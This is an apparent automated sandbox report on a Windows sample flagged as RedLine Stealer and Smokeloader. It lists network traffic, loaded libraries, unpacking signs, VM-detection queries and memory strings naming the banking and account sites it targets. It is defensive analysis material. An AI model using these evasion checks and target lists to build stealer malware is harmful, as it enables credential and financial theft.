            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49703 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49746 version: TLS 1.2

            System Summary

            barindex
            Source: 00000004.00000002.1650950894.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000004.00000002.1651366354.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070DDF84_3_0070DDF8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 616
            Source: 4JPKDcwtDo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000004.00000002.1650950894.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000004.00000002.1651366354.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 4JPKDcwtDo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/1
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7120
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\fe107cd5-e499-4b8c-a991-c764d95e1000Jump to behavior
            Source: 4JPKDcwtDo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308922639.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1309017688.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1321165449.0000000002D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4JPKDcwtDo.exeReversingLabs: Detection: 60%
            Source: 4JPKDcwtDo.exeVirustotal: Detection: 56%
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile read: C:\Users\user\Desktop\4JPKDcwtDo.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\4JPKDcwtDo.exe "C:\Users\user\Desktop\4JPKDcwtDo.exe"
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 616
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeUnpacked PE file: 4.2.4JPKDcwtDo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeUnpacked PE file: 4.2.4JPKDcwtDo.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_0070C969 push ebp; ret 4_3_0070C97A
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeCode function: 4_3_00716EC7 push cs; iretd 4_3_00716EC8
            Source: 4JPKDcwtDo.exeStatic PE information: section name: .text entropy: 7.433590009651865
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe TID: 7356Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exe TID: 7356Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.11.drBinary or memory string: VMware
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
            Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 4JPKDcwtDo.exe, 4JPKDcwtDo.exe, 00000004.00000003.1352162990.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1363898461.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000002.1650981832.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1401175680.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
            Source: Amcache.hve.11.drBinary or memory string: vmci.sys
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: Amcache.hve.11.drBinary or memory string: VMware20,1
            Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320668024.0000000002D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
